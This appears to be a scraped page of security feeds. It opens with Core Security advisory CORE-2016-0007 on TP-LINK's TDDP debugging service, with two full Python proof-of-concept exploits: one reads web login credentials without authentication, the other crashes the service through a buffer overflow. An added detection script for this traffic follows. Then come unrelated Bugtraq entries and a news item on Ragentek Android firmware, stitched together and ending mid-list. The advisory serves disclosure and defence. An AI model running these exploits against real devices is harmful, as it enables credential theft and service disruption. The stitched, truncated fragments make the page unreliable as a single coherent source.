1. Advisory Information

Title: TP-LINK TDDP Multiple Vulnerabilities
Advisory ID: CORE-2016-0007
Advisory URL: http://www.coresecurity.com/advisories/tp-link-tddp-multiple-vulnerabilities
Date published: 2016-11-21
Date of last update: 2016-11-18
Vendors contacted: TP-Link
Release mode: User release

2. Vulnerability Information

Class: Missing Authentication for Critical Function [CWE-306], Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') [CWE-120]
Impact: Code execution, Information leak
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-pending-assignment-1, CVE-pending-assignment-2

3. Vulnerability Description

TP-LINK [1] ships some of their devices with a debugging protocol activated by default. This debugging protocol listens on UDP port 1040 on the LAN interface.

Vulnerabilities were found in the implementation of this protocol that could lead to remote code execution and an information leak (credential acquisition).

4. Vulnerable Devices

TP-LINK WA5210g (firmware v1 and v2 are vulnerable).
Other devices might be affected, but they were not tested.

5. Vendor Information, Solutions and Workarounds

No workarounds are available for this device.

6. Credits

This vulnerability was discovered and researched by Andres Lopez Luksenberg from Core Security Exploit Team. The publication of this advisory was coordinated by Joaquin Rodriguez Varela from Core Advisories Team.

7. Technical Description / Proof of Concept Code

TP-LINK distributes some of their hardware with a debugging service activated by default. This service uses a custom protocol (TDDP). Vulnerabilities were found in the handling of this protocol that could lead to remote code execution or an information leak.

7.1. Missing Authentication for TDDP v1

[CVE-pending-assignment-1] If version 1 is selected when communicating with the TDDP service, no authentication is performed. Additionally, if the message handler accepts the "Get configuration" message type, the program leaks the web interface configuration file, which includes the web login credentials.

The following is a proof of concept to demonstrate the vulnerability (Impacket [2] is required for the PoC to work):

import socket
import re
from impacket.winregistry import hexdump
from impacket.structure import Structure
import struct

# Python 2 PoC: relies on the print statement, basestring and str-typed payloads.

class TDDP(Structure):
    # TDDP header: four single-byte fields, a big-endian length, a little-endian
    # packet id, two more bytes and then the raw payload.
    structure = (
        ('version','B=0x1'),
        ('type','B=0'),
        ('code','B=0'),
        ('replyInfo','B=0'),
        ('packetLength','>L=0'),
        ('pktID','<H=1'),
        ('subType','B=0'),
        ('reserved','B=0'),
        ('payload',':=""'),
    )

    def printPayload(self):
        print self.getPayloadAsString()

    def getPayloadAsString(self):
        s = ''
        for i in range(len(self['payload'])):
            s += "%.2X" % struct.unpack("B", self['payload'][i])[0]
        return s

class TDDPRequestsPacketBuilder(object):
    SET_CONFIG = 1
    GET_CONFIG = 2
    CMD_SYS0_PR = 3
    GET_SERIAL_NUMBER = 5

    GET_PRODUCT_ID = 10

    def getRequestPacket(self):
        # Version 1 is the unauthenticated variant of the protocol.
        tddp = TDDP()
        tddp['version'] = 1
        tddp['replyInfo'] = 1
        return tddp

    def getConfigPacket(self):
        # Payload: 16 zero bytes followed by the section to read ('all').
        tddp = self.getRequestPacket()
        tddp['type'] = self.GET_CONFIG
        tddp['payload'] = ('\x00'*0x10) + 'all'
        tddp['packetLength'] = len(tddp['payload'])
        return tddp

    def setConfigPacket(self, trail):
        tddp = self.getRequestPacket()
        tddp['type'] = self.SET_CONFIG
        tddp['payload'] = ('\x00'*0x10) + trail
        tddp['packetLength'] = len(tddp['payload'])
        return tddp

    def getSerialNumberPacket(self):
        tddp = self.getRequestPacket()
        tddp['type'] = self.GET_SERIAL_NUMBER
        return tddp

    def getProductIDPacket(self):
        tddp = self.getRequestPacket()
        tddp['type'] = self.GET_PRODUCT_ID
        return tddp

    def CMD_SYS0_PR_Packet(self, trail):
        # packetLength only covers the 16-byte prefix; the command is appended after.
        tddp = self.getRequestPacket()
        tddp['type'] = self.CMD_SYS0_PR
        tddp['replyInfo'] = 2
        tddp['payload'] = ('\x00'*0x10)
        tddp['packetLength'] = len(tddp['payload'])
        tddp['payload'] += trail
        return tddp

class TPLINKConfig(object):
    # Configuration file as returned by the device: a 16-byte header followed
    # by "key value" lines separated by CRLF.
    def __init__(self, aConfig):
        self.__parseConfig(aConfig)

    def __sanitizeKeyValue(self, k, v):
        k = k.replace("\r", "")
        k = k.replace("\n", "")

        v = v.replace("\r", "")
        v = v.replace("\n", "")

        return k, v

    def __parseConfig(self, aConfig):
        self.__key_order = []
        self.Header = aConfig[:0x10]
        pending = aConfig[0x10:]
        k_v = re.findall("(.*?) (.*)", pending)

        for k, v in k_v:
            k, v = self.__sanitizeKeyValue(k, v)
            real_value = v.split(" ")
            if len(real_value) == 1:
                real_value = real_value[0]

            self.__dict__[k] = real_value
            self.__key_order.append(k)

    def __str__(self):
        cfg = []
        cfg.append(self.Header)

        for k in self.__key_order:
            value = self.__dict__[k]

            if not isinstance(value, basestring):
                str_value = " ".join(value)
            else:
                str_value = value

            line = "%s %s" % (k, str_value)

            cfg.append(line)

        str_cfg = "\r\n".join(cfg)

        return str_cfg

class TDDPSessionV1(object):
    def __init__(self, ip, port=1040):
        self.ip = ip
        self.port = port
        self.req_buidler = TDDPRequestsPacketBuilder()

    def send(self, aPacket):
        self.conn = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self.conn.sendto(str(aPacket), (self.ip, self.port))
        self.conn.close()

    def recv(self, n):
        # The device answers to UDP port 61000 on the client side.
        udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        udp.bind(('', 61000))
        data, addr = udp.recvfrom(n)
        return TDDP(data)

    def _send_and_recv(self, packet, n):
        self.send(packet)
        return self.recv(n)

    #####################################
    def getConfig(self):
        c_packet = self.req_buidler.getConfigPacket()
        return TPLINKConfig(self._send_and_recv(c_packet, 50000)['payload'])

    def getSerialNumber(self):
        c_packet = self.req_buidler.getSerialNumberPacket()
        return self._send_and_recv(c_packet, 50000).getPayloadAsString()

    def getProductID(self):
        c_packet = self.req_buidler.getProductIDPacket()
        return self._send_and_recv(c_packet, 50000).getPayloadAsString()

    def setInitState(self):
        c_packet = self.req_buidler.CMD_SYS0_PR_Packet("init")
        return self._send_and_recv(c_packet, 50000)

    def save(self):
        c_packet = self.req_buidler.CMD_SYS0_PR_Packet("save")
        self._send_and_recv(c_packet, 50000)

    def reboot(self):
        c_packet = self.req_buidler.CMD_SYS0_PR_Packet("reboot")
        self._send_and_recv(c_packet, 50000)

    def clr_dos(self):
        c_packet = self.req_buidler.CMD_SYS0_PR_Packet("clr_dos")
        self._send_and_recv(c_packet, 50000)

    def setConfig(self, aConfig):
        c_packet = self.req_buidler.setConfigPacket(str(aConfig))
        self._send_and_recv(c_packet, 50000)

HOST = "192.168.1.254"

s = TDDPSessionV1(HOST)
config = s.getConfig()
print "user: ", config.lgn_usr
print "pass: ", config.lgn_pwd

7.2. Buffer Overflow in TDDP v1 protocol

[CVE-pending-assignment-2] A buffer overflow vulnerability was found when sending a handcrafted "set configuration" message to the TDDP service with an overly large configuration file while forcing version 1 in the packet.

The following is a proof of concept that demonstrates the vulnerability by crashing the TDDP service (Impacket [2] is required for the PoC to work). To re-establish the TDDP service the device must be restarted:

import socket
import re
import string
from impacket.winregistry import hexdump
from impacket.structure import Structure
import struct

# Python 2 PoC: relies on the print statement, basestring and str-typed payloads.

class TDDP(Structure):
    structure = (
        ('version','B=0x1'),
        ('type','B=0'),
        ('code','B=0'),
        ('replyInfo','B=0'),
        ('packetLength','>L=0'),
        ('pktID','<H=1'),
        ('subType','B=0'),
        ('reserved','B=0'),
        ('payload',':=""'),
    )

    def printPayload(self):
        print self.getPayloadAsString()

    def getPayloadAsString(self):
        s = ''
        for i in range(len(self['payload'])):
            s += "%.2X" % struct.unpack("B", self['payload'][i])[0]
        return s

class TDDPRequestsPacketBuilder(object):
    SET_CONFIG = 1
    GET_CONFIG = 2
    CMD_SYS0_PR = 3
    GET_SERIAL_NUMBER = 5

    GET_PRODUCT_ID = 10

    def getRequestPacket(self):
        tddp = TDDP()
        tddp['version'] = 1
        tddp['replyInfo'] = 1
        return tddp

    def getConfigPacket(self):
        tddp = self.getRequestPacket()
        tddp['type'] = self.GET_CONFIG
        tddp['payload'] = ('\x00'*0x10) + 'all'
        tddp['packetLength'] = len(tddp['payload'])
        return tddp

    def setConfigPacket(self, trail):
        tddp = self.getRequestPacket()
        tddp['type'] = self.SET_CONFIG
        tddp['payload'] = ('\x00'*0x10) + trail
        tddp['packetLength'] = len(tddp['payload'])
        return tddp

    def getSerialNumberPacket(self):
        tddp = self.getRequestPacket()
        tddp['type'] = self.GET_SERIAL_NUMBER
        return tddp

    def getProductIDPacket(self):
        tddp = self.getRequestPacket()
        tddp['type'] = self.GET_PRODUCT_ID
        return tddp

    def CMD_SYS0_PR_Packet(self, trail):
        tddp = self.getRequestPacket()
        tddp['type'] = self.CMD_SYS0_PR
        tddp['replyInfo'] = 2
        tddp['payload'] = ('\x00'*0x10)
        tddp['packetLength'] = len(tddp['payload'])
        tddp['payload'] += trail
        return tddp

class TPLINKConfig(object):
    def __init__(self, aConfig):
        self.__parseConfig(aConfig)

    def __sanitizeKeyValue(self, k, v):
        k = k.replace("\r", "")
        k = k.replace("\n", "")

        v = v.replace("\r", "")
        v = v.replace("\n", "")

        return k, v

    def __parseConfig(self, aConfig):
        self.__key_order = []
        self.Header = aConfig[:0x10]
        pending = aConfig[0x10:]
        k_v = re.findall("(.*?) (.*)", pending)

        for k, v in k_v:
            k, v = self.__sanitizeKeyValue(k, v)
            real_value = v.split(" ")
            if len(real_value) == 1:
                real_value = real_value[0]

            self.__dict__[k] = real_value
            self.__key_order.append(k)

    def __str__(self):
        cfg = []
        cfg.append(self.Header)

        for k in self.__key_order:
            value = self.__dict__[k]

            if not isinstance(value, basestring):
                str_value = " ".join(value)
            else:
                str_value = value

            line = "%s %s" % (k, str_value)

            cfg.append(line)

        str_cfg = "\r\n".join(cfg)

        return str_cfg

class TDDPSessionV1(object):
    def __init__(self, ip, port=1040):
        self.ip = ip
        self.port = port
        self.req_buidler = TDDPRequestsPacketBuilder()

    def send(self, aPacket):
        self.conn = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self.conn.sendto(str(aPacket), (self.ip, self.port))
        self.conn.close()

    def recv(self, n):
        udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        udp.bind(('', 61000))
        data, addr = udp.recvfrom(n)
        return TDDP(data)

    def _send_and_recv(self, packet, n):
        self.send(packet)
        return self.recv(n)

    #####################################
    def getConfig(self):
        c_packet = self.req_buidler.getConfigPacket()
        return TPLINKConfig(self._send_and_recv(c_packet, 50000)['payload'])

    def getSerialNumber(self):
        c_packet = self.req_buidler.getSerialNumberPacket()
        return self._send_and_recv(c_packet, 50000).getPayloadAsString()

    def getProductID(self):
        c_packet = self.req_buidler.getProductIDPacket()
        return self._send_and_recv(c_packet, 50000).getPayloadAsString()

    def setInitState(self):
        c_packet = self.req_buidler.CMD_SYS0_PR_Packet("init")
        return self._send_and_recv(c_packet, 50000)

    def save(self):
        c_packet = self.req_buidler.CMD_SYS0_PR_Packet("save")
        self._send_and_recv(c_packet, 50000)

    def reboot(self):
        c_packet = self.req_buidler.CMD_SYS0_PR_Packet("reboot")
        self._send_and_recv(c_packet, 50000)

    def clr_dos(self):
        c_packet = self.req_buidler.CMD_SYS0_PR_Packet("clr_dos")
        self._send_and_recv(c_packet, 50000)

    def setConfig(self, aConfig):
        c_packet = self.req_buidler.setConfigPacket(str(aConfig))
        self._send_and_recv(c_packet, 50000)

class Exploit(TDDPSessionV1):
    def run(self):
        # SET_CONFIG with a 325-byte payload; the declared packetLength (0x264)
        # is deliberately larger than the payload actually sent.
        c_packet = self.req_buidler.getRequestPacket()
        c_packet['type'] = self.req_buidler.SET_CONFIG
        c_packet['payload'] = "A"*325
        c_packet['packetLength'] = 0x0264
        return self.send(c_packet)

HOST = "192.168.1.254"
PORT = 1040
s = Exploit(HOST)
s.run()
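Since no patch or workaround exists, the practical defence is to watch UDP port 1040 on the LAN. The following is an added example (not part of the Core Security advisory) that decodes the TDDP header exactly as the PoC's Structure lays it out and flags the two conditions described in 7.1 and 7.2: unauthenticated v1 configuration requests and an oversized or mis-sized v1 SET_CONFIG, plus a GET_CONFIG reply that carries lgn_usr/lgn_pwd in clear text. The sample datagrams are constructed here, and the 256-byte SET_CONFIG threshold is an assumed tuning value, not a documented buffer size.

```python
import struct
from dataclasses import dataclass
from typing import Dict, List, Optional

TDDP_PORT = 1040   # UDP port of the debugging service, per the advisory
HEADER_LEN = 12    # 4 x 1-byte fields + 4-byte packetLength + 2-byte pktID + 2 x 1-byte fields

# Message types as used by the advisory's PoC packet builder.
SET_CONFIG, GET_CONFIG, CMD_SYS0_PR, GET_SERIAL_NUMBER, GET_PRODUCT_ID = 1, 2, 3, 5, 10
TYPE_NAMES = {SET_CONFIG: "set-config", GET_CONFIG: "get-config", CMD_SYS0_PR: "cmd-sys0-pr"}

# Assumption: a v1 SET_CONFIG whose declared or actual payload exceeds this many
# bytes is reported as an overflow attempt. The PoC crashes the service with
# 325 bytes; the threshold is a tuning knob, not a limit taken from the firmware.
SET_CONFIG_MAX_PAYLOAD = 256


@dataclass
class TDDPMessage:
    version: int
    msg_type: int
    code: int
    reply_info: int
    packet_length: int
    pkt_id: int
    sub_type: int
    reserved: int
    payload: bytes


def parse_tddp(data: bytes) -> Optional[TDDPMessage]:
    """Decode the 12-byte TDDP header; None for datagrams too short to be TDDP."""
    if len(data) < HEADER_LEN:
        return None
    version, msg_type, code, reply_info, packet_length = struct.unpack(">BBBBL", data[:8])
    (pkt_id,) = struct.unpack("<H", data[8:10])  # pktID is little-endian in the PoC layout
    return TDDPMessage(version, msg_type, code, reply_info, packet_length,
                       pkt_id, data[10], data[11], data[HEADER_LEN:])


def build_tddp(version: int, msg_type: int, reply_info: int, payload: bytes,
               packet_length: Optional[int] = None) -> bytes:
    """Serialise a message with the PoC's field layout (only used to build samples)."""
    if packet_length is None:
        packet_length = len(payload)
    return (struct.pack(">BBBBL", version, msg_type, 0, reply_info, packet_length)
            + struct.pack("<H", 1) + b"\x00\x00" + payload)


def config_keys(payload: bytes) -> Dict[str, str]:
    """Split a config payload: 16 opaque header bytes, then CRLF 'key value' lines."""
    keys: Dict[str, str] = {}
    for line in payload[16:].decode("latin-1").splitlines():
        if " " in line:
            k, v = line.split(" ", 1)
            keys[k] = v
    return keys


def analyse_datagram(src_port: int, dst_port: int, data: bytes) -> List[str]:
    """Return finding tags for one UDP datagram observed on the LAN segment."""
    findings: List[str] = []
    msg = parse_tddp(data)
    if msg is None:
        return findings
    if msg.packet_length != len(msg.payload):
        findings.append(f"length-mismatch: header says {msg.packet_length}, got {len(msg.payload)}")
    if dst_port == TDDP_PORT and msg.version == 1:
        # Requests towards the service: version 1 carries no authentication at all.
        if msg.msg_type in TYPE_NAMES:
            findings.append(f"tddp-v1-unauthenticated-{TYPE_NAMES[msg.msg_type]}")
        if msg.msg_type == SET_CONFIG and max(msg.packet_length, len(msg.payload)) > SET_CONFIG_MAX_PAYLOAD:
            findings.append("tddp-v1-oversized-set-config")
    if src_port == TDDP_PORT and msg.version == 1:
        # Replies from the service: a GET_CONFIG answer carries the web login in clear text.
        if config_keys(msg.payload).keys() & {"lgn_usr", "lgn_pwd"}:
            findings.append("tddp-v1-credential-leak-in-reply")
    return findings


# Constructed sample traffic (not captured from a real device).
SAMPLES = [
    ("get-config request", 61000, TDDP_PORT,
     build_tddp(1, GET_CONFIG, 1, b"\x00" * 0x10 + b"all")),
    ("oversized set-config", 61000, TDDP_PORT,
     build_tddp(1, SET_CONFIG, 1, b"A" * 325, packet_length=0x0264)),
    ("config reply", TDDP_PORT, 61000,
     build_tddp(1, GET_CONFIG, 0, b"\x00" * 0x10 + b"lgn_usr admin\r\nlgn_pwd example-only\r\n")),
    ("v2 serial request", 61000, TDDP_PORT,
     build_tddp(2, GET_SERIAL_NUMBER, 1, b"")),
]

if __name__ == "__main__":
    for label, sport, dport, datagram in SAMPLES:
        print(f"{label}: {analyse_datagram(sport, dport, datagram) or 'no findings'}")
```

Feed it datagrams from a LAN capture (for example via a scapy or pyshark sniffer on port 1040) and forward any finding to your SIEM; a config reply finding means the web credentials have already left the device.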

8. Report Timeline

2016-10-04: Core Security sent an initial notification to TP-Link.
2016-10-07: Core Security sent a second notification to TP-Link.
2016-10-31: Core Security sent a third notification to TP-Link through Twitter.
2016-11-09: Core Security sent a fourth notification to TP-Link through email and Twitter without receiving any response whatsoever.
2016-11-10: Core Security sent a request to Mitre for two CVE ID's for this advisory.
2016-11-12: Mitre replied that the vulnerabilities did not affect products that were in scope for CVE.
2016-11-21: Advisory CORE-2016-0007 published.

9. References

[1] http://www.tplink.com/.
[2] https://www.coresecurity.com/corelabs-research/open-source-tools/impacket.

10. About CoreLabs

CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.

11. About Core Security

Courion and Core Security have rebranded the combined company, changing its name to Core Security, to reflect the company's strong commitment to providing enterprises with market-leading, threat-aware, identity, access and vulnerability management solutions that enable actionable intelligence and context needed to manage security risks across the enterprise. Core Security's analytics-driven approach to security enables customers to manage access and identify vulnerabilities, in order to minimize risks and maintain continuous compliance. Solutions include Multi-Factor Authentication, Provisioning, Identity Governance and Administration (IGA), Identity and Access Intelligence (IAI), and Vulnerability Management (VM). The combination of these solutions provides context and shared intelligence through analytics, giving customers a more comprehensive view of their security posture so they can make more informed, prioritized, and better security remediation decisions.

Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or [email protected]

12. Disclaimer

The contents of this advisory are copyright (c) 2016 Core Security and (c) 2016 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/


Exploit Files ≈ Packet Storm

Bugtraq ID: 93191
Class: Design Error
CVE: CVE-2016-7099
Remote: Yes
Local: No
Published: Sep 28 2016 12:00AM
Updated: Nov 19 2016 01:03AM
Credit: Alexander Minozhenko and James Bunton (Atlassian).

Vulnerable:
Nodejs Node.Js 6.0
Nodejs Node.Js 4.0
Nodejs Node.Js 0.12
IBM SDK for Node.js 6.6.0.0
IBM SDK for Node.js 6.2.0.0
IBM SDK for Node.js 6.1.0.0
IBM SDK for Node.js 6.0.0.0
IBM SDK for Node.js 4.5.0.0
IBM SDK for Node.js 4.4.6.0
IBM SDK for Node.js 4.4.5.0
IBM SDK for Node.js 4.4.4.0
IBM SDK for Node.js 4.4.3.0
IBM SDK for Node.js 4.4.2.0
IBM SDK for Node.js 4.4.1.0
IBM SDK for Node.js 4.4.0.0
IBM SDK for Node.js 4.3.2.0
IBM SDK for Node.js 4.3.1.0
IBM SDK for Node.js 1.2.0.9
IBM SDK for Node.js 1.2.0.8
IBM SDK for Node.js 1.2.0.4
IBM SDK for Node.js 1.2.0.3
IBM SDK for Node.js 1.2.0.2
IBM SDK for Node.js 1.2.0.14
IBM SDK for Node.js 1.2.0.13
IBM SDK for Node.js 1.2.0.12
IBM SDK for Node.js 1.2.0.11
IBM SDK for Node.js 1.2.0.10
IBM SDK for Node.js 1.2.0.1
IBM SDK for Node.js 1.1.1.3
IBM SDK for Node.js 1.1.1.2
IBM SDK for Node.js 1.1.1.1
IBM SDK for Node.js 1.1.1.0
IBM SDK for Node.js 1.1.0.9
IBM SDK for Node.js 1.1.0.7
IBM SDK for Node.js 1.1.0.6
IBM SDK for Node.js 1.1.0.5
IBM SDK for Node.js 1.1.0.3
IBM SDK for Node.js 1.1.0.21
IBM SDK for Node.js 1.1.0.20
IBM SDK for Node.js 1.1.0.2
IBM SDK for Node.js 1.1.0.19
IBM SDK for Node.js 1.1.0.18
IBM SDK for Node.js 1.1.0.15
IBM SDK for Node.js 1.1.0.14
IBM SDK for Node.js 1.1.0.13
IBM SDK for Node.js 1.1.0.12
IBM SDK for Node.js 1.1
IBM Rational Application Developer for WebSphere Software 9.5
IBM Rational Application Developer for WebSphere Software 9.1

Not Vulnerable:
Nodejs Node.Js 6.7
Nodejs Node.Js 4.6
Nodejs Node.Js 0.12.16
IBM SDK for Node.js 6.7.0.0
IBM SDK for Node.js 4.6.0.0
IBM SDK for Node.js 1.2.0.15
IBM SDK for Node.js 1.1.1.4


SecurityFocus Vulnerabilities

If you’re using a cheap Android smartphone manufactured or sold by BLU, Infinix, Doogee, Leagoo, IKU, Beeline or Xolo, you are likely wide open to Man-in-the-Middle attacks that can result in your device being thoroughly compromised.


A more detailed (but not complete) list of vulnerable devices can be found in an advisory by CERT/CC.

This discovery comes less than a week after researchers from Kryptowire identified several models of Android mobile devices that contain firmware that collects sensitive data about their owners and secretly transmits it to servers owned by a company named Shanghai Adups Technology Co. Ltd.

Among these mobile devices are also some BLU smartphones.

The origin of the vulnerability (CVE-2016-6564)

Those and other devices (roughly 55 device models) are open to attack because they sport the same firmware by Chinese software company Ragentek Group.

This firmware contains a binary that is responsible for enabling over-the-air (OTA) software updating, but unfortunately the mechanism is flawed.

For one, the update requests and supplied updates are sent over an unencrypted channel. Secondly, until a few days ago, two Internet domains that the firmware is instructed to contact for updates (the addresses are hardwired into it) were unregistered – meaning anybody could have registered them and delivered malicious updates and commands to compromise the devices.

Luckily, it was researchers from Anubis Networks who did it, and the move allowed them to clock over 2.8 million devices that contacted the domains in search of updates. Many of these devices are located in the US, as most of the models are sold by Best Buy and Amazon.

But even though the domains are now owned by these security companies, the fact that updates are delivered over an unencrypted channel allows attackers with a MitM position to intercept legitimate updates and exchange them for malicious ones (the firmware does not check for any signatures to assure the updates’ legitimacy).

MitM attackers could also send responses that would make the devices execute arbitrary commands as root, install applications, or update configurations.

Is this a deliberate backdoor/rootkit?

It does seem so. According to the researchers, the binary that performs OTA update checks – debugs, in the /system/bin/ folder – runs with root privileges, but its presence and the process it starts are being actively hidden by the firmware.

“It’s unclear why the author of this process wanted to purposely hide the presence of the process and local database on the device, although it’s worth noting that it did not attempt to do this comprehensively,” the researchers noted.

But they told Ars Technica that they believe the backdoor capabilities were unintentional, and Ragentek has yet to comment on the discovery.

How to protect yourself?

If you’re using one of the affected devices, the right solution is to implement an update with the fix – when it becomes available. But make sure to download the update only over trusted networks and/or use a VPN to encrypt and protect the traffic from tampering.

So far, only BLU has released such an update, but the fix has not yet been checked.

A workaround that should keep you safe until a security update arrives is to use your device only on trusted networks (e.g. your home network, as opposed to open or public Wi-Fi).


Help Net Security

Bugtraq ID: 92630
Class: Design Error
CVE: CVE-2016-2183
Remote: Yes
Local: No
Published: Aug 24 2016 12:00AM
Updated: Nov 19 2016 12:10AM
Credit: Karthik Bhargavan and Gaetan Leurent from Inria.

Vulnerable:
Redhat Enterprise Linux 7
Redhat Enterprise Linux 6
Redhat Enterprise Linux 5
Pexip Pexip Infinity 9.1
Pexip Pexip Infinity 9
Pexip Pexip Infinity 8.1
Pexip Pexip Infinity 8
Pexip Pexip Infinity 7
Pexip Pexip Infinity 6
Pexip Pexip Infinity 5
Pexip Pexip Infinity 4
Pexip Pexip Infinity 12.2
Pexip Pexip Infinity 12.1
Pexip Pexip Infinity 12
Pexip Pexip Infinity 11.1
Pexip Pexip Infinity 11
Pexip Pexip Infinity 10.2
Pexip Pexip Infinity 10.1
Pexip Pexip Infinity 10
Oracle VM VirtualBox 5.0.26
Oracle VM VirtualBox 5.0.22
Oracle VM VirtualBox 5.0.16
Oracle VM VirtualBox 5.0.14
Oracle VM VirtualBox 5.0.13
Oracle VM VirtualBox 5.0.12
Oracle VM VirtualBox 5.0.11
Oracle VM VirtualBox 5.0.10
Oracle VM VirtualBox 5.0.9
Oracle VM VirtualBox 5.0.8
Oracle VM VirtualBox 5.0.18
Oracle VM VirtualBox 5.0
Oracle Mysql 5.7.15
Oracle Mysql 5.7.14
Oracle Mysql 5.7.13
Oracle Mysql 5.7.12
Oracle Mysql 5.7.9
Oracle Mysql 5.7.8
Oracle Mysql 5.7.7
Oracle Mysql 5.7.6
Oracle Mysql 5.7.5
Oracle Mysql 5.7.4
Oracle Mysql 5.7.3
Oracle Mysql 5.7.2
Oracle Mysql 5.6.33
Oracle Mysql 5.6.32
Oracle Mysql 5.6.31
Oracle Mysql 5.6.30
Oracle Mysql 5.6.28
Oracle Mysql 5.6.27
Oracle Mysql 5.6.26
Oracle Mysql 5.6.25
Oracle Mysql 5.6.24
Oracle Mysql 5.6.23
Oracle Mysql 5.6.22
Oracle Mysql 5.6.21
Oracle Mysql 5.6.17
Oracle Mysql 5.6.12
Oracle Mysql 5.6.11
Oracle Mysql 5.6.10
Oracle Mysql 5.6.9
Oracle Mysql 5.6.6
Oracle Mysql 5.6
Oracle Mysql 5.7.11
Oracle Mysql 5.7.10
Oracle Mysql 5.6.8
Oracle Mysql 5.6.7
Oracle Mysql 5.6.5
Oracle Mysql 5.6.4
Oracle Mysql 5.6.29
Oracle Mysql 5.6.20
Oracle Mysql 5.6.2
Oracle Mysql 5.6.19
Oracle Mysql 5.6.18
Oracle Mysql 5.6.16
Oracle Mysql 5.6.15
Oracle Mysql 5.6.14
Oracle Mysql 5.6.13
Oracle Enterprise Linux 5
OpenSSL Project OpenSSL 1.0.2h
OpenSSL Project OpenSSL 1.0.1t
NetApp Virtual Storage Console for VMware vSphere 0
NetApp System Setup 0
NetApp Snap Creator Framework 0
NetApp ONTAP Select Deploy administration tool 0
NetApp OnCommand Insight 0
NetApp OnCommand API Services 0
NetApp Manageability SDK 0
NetApp EF-Series SANtricity Storage Manager 0
NetApp E-Series SANtricity Storage Manager 0
NetApp Data ONTAP PowerShell Toolkit 0
NetApp Data ONTAP 7-Mode 0
NetApp Clustered Data ONTAP 0
IBM Vios 2.2
IBM Sterling Connect:Express for UNIX 1.5.0.9
IBM Sterling Connect:Express for UNIX 1.5.0.13
IBM Sterling Connect:Express for UNIX 1.5.0.12
IBM Sterling Connect:Express for UNIX 1.5.0.11
IBM Sterling Connect:Express for UNIX 1.5.0
IBM Sterling Connect:Express for UNIX 1.4.6
IBM Sterling Connect:Express for UNIX 1.4
IBM SDK for Node.js 6.6.0.0
IBM SDK for Node.js 6.2.0.0
IBM SDK for Node.js 6.1.0.0
IBM SDK for Node.js 6.0.0.0
IBM SDK for Node.js 4.5.0.0
IBM SDK for Node.js 4.4.6.0
IBM SDK for Node.js 4.4.5.0
IBM SDK for Node.js 4.4.4.0
IBM SDK for Node.js 4.4.3.0
IBM SDK for Node.js 4.4.2.0
IBM SDK for Node.js 4.4.1.0
IBM SDK for Node.js 4.4.0.0
IBM SDK for Node.js 4.3.2.0
IBM SDK for Node.js 4.3.1.0
IBM SDK for Node.js 1.2.0.9
IBM SDK for Node.js 1.2.0.8
IBM SDK for Node.js 1.2.0.4
IBM SDK for Node.js 1.2.0.3
IBM SDK for Node.js 1.2.0.2
IBM SDK for Node.js 1.2.0.14
IBM SDK for Node.js 1.2.0.13
IBM SDK for Node.js 1.2.0.12
IBM SDK for Node.js 1.2.0.11
IBM SDK for Node.js 1.2.0.10
IBM SDK for Node.js 1.2.0.1
IBM SDK for Node.js 1.1.1.3
IBM SDK for Node.js 1.1.1.2
IBM SDK for Node.js 1.1.1.1
IBM SDK for Node.js 1.1.1.0
IBM SDK for Node.js 1.1.0.9
IBM SDK for Node.js 1.1.0.7
IBM SDK for Node.js 1.1.0.6
IBM SDK for Node.js 1.1.0.5
IBM SDK for Node.js 1.1.0.3
IBM SDK for Node.js 1.1.0.21
IBM SDK for Node.js 1.1.0.20
IBM SDK for Node.js 1.1.0.2
IBM SDK for Node.js 1.1.0.19
IBM SDK for Node.js 1.1.0.18
IBM SDK for Node.js 1.1.0.15
IBM SDK for Node.js 1.1.0.14
IBM SDK for Node.js 1.1.0.13
IBM SDK for Node.js 1.1.0.12
IBM SDK for Node.js 1.1
IBM Rational Application Developer for WebSphere Software 9.5
IBM Rational Application Developer for WebSphere Software 9.1
IBM i 7.3
IBM i 7.2
IBM i 7.1
IBM BigFix Remote Control 9.1.2
IBM Aix 7.2
IBM AIX 7.1
IBM AIX 6.1
IBM AIX 5.3
HP Integrated Lights-Out 4 firmware 2.50
HP Integrated Lights-Out 4 firmware 2.44
HP Integrated Lights-Out 4 firmware 2.22
HP Integrated Lights-Out 4 firmware 2.20
HP Integrated Lights-Out 4 firmware 2.03
HP Integrated Lights-Out 4 firmware 1.32
HP Integrated Lights-Out 4 firmware 1.30
HP Integrated Lights-Out 4 firmware 1.22
HP Integrated Lights-Out 4 firmware 1.13
HP Integrated Lights-Out 4 firmware 1.11
HP Integrated Lights-Out 4 firmware 2.10
Cisco Wide Area Application Services (WAAS) 0
Cisco WebEx Node for MCS 0
Cisco WebEx Meetings Server - Multimedia Platform (MMP) 0
Cisco WebEx Meetings Server 2.0
Cisco WebEx Meetings Server 1.0
Cisco WebEx Meetings for Windows Phone 8 0
Cisco WebEx Meetings for BlackBerry 0
Cisco WebEx Meetings for Android 0
Cisco WebEx Meetings Client - On-Premises 0
Cisco WebEx Meetings Client - Hosted 0
Cisco WebEx Meeting Center 0
Cisco WebEx Business Suite 0
Cisco Web Security Appliance (WSA) 0
Cisco Visual Quality Experience Tools Server 0
Cisco Visual Quality Experience Server 0
Cisco Virtualization Experience Media Edition 0
Cisco Virtual Security Gateway 0
Cisco Videoscape Control Suite 0
Cisco Videoscape AnyRes Live 0
Cisco Video Surveillance PTZ IP Cameras 0
Cisco Video Surveillance Media Server 0
Cisco Video Surveillance 7000 Series IP Cameras 0
Cisco Video Surveillance 6000 Series IP Cameras 0
Cisco Video Surveillance 4300E and 4500E High-Definition IP Cameras 0
Cisco Video Surveillance 4000 Series High-Definition IP Cameras 0
Cisco Video Surveillance 3000 Series IP Cameras 0
Cisco Video Distribution Suite for Internet Streaming (VDS-IS/CDS-IS) 0
